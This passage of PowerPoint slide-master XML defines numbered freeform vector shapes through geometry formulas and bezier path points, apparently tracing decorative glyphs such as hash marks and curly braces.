                      <a:pt x="71" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="45"/>
                      <a:pt x="71"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5" name="Freeform 122"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4080" y="3708"/>
                <a:ext cx="3"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0"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6" name="Freeform 123"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4093" y="3708"/>
                <a:ext cx="3" cy="3"/>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2" y="2"/>
                      <a:pt x="2"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Freeform 124"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2044"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Freeform 125"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2193"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Freeform 126"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2388"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Freeform 127"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2813"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Freeform 128"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2960"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2" name="Freeform 129"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3159"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Freeform 130"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3308"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4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23"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4" name="Freeform 131"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3456" y="4023"/>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Freeform 132"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3654"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Freeform 133"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="380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Freeform 134"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3996"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Freeform 135"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="419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Freeform 136"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4389"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Freeform 137"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="453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Freeform 138"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4723" y="4027"/>
                <a:ext cx="187" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 187 w 187"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 184 w 187"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 141 w 187"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 130 w 187"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 176 w 187"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 173 w 187"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 126 w 187"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 112 w 187"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 91 w 187"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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20">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>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2" name="Freeform 139"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 140"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137"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Freeform 141"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="4023"/>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Freeform 142"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 143"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="563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7" name="Freeform 144"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828"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8" name="Freeform 145"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="597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Freeform 146"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172"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Freeform 147"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="4027"/>
                <a:ext cx="189" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 62 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 122 w 189"/>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20">
                    <a:moveTo>
                      <a:pt x="189" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 148"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 149"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769"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Freeform 150"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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4" name="Freeform 151"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114"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Freeform 152"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312"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Freeform 153"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="4027"/>
                <a:ext cx="76" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 21 w 63"/>
                  <a:gd name="T3" fmla="*/ 199 h 241"/>
                  <a:gd name="T4" fmla="*/ 21 w 63"/>
                  <a:gd name="T5" fmla="*/ 158 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 129 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 113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7 w 63"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 224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1"/>
                      <a:pt x="21" y="227"/>
                      <a:pt x="21" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="139"/>
                      <a:pt x="14" y="130"/>
                      <a:pt x="0" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="1"/>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7"/>
                      <a:pt x="42" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="213"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="224"/>
                      <a:pt x="63" y="224"/>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Freeform 154"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="4027"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 129 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 158 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 199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9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="130"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="41" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="227"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="224"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="213"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="137"/>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8" y="112"/>
                      <a:pt x="63" y="113"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63"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Freeform 155"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669"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Freeform 156"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="401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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="171"/>
                      <a:pt x="174" y="172"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="187"/>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199"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="81" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54"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5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>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80"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="7" y="192"/>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0"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
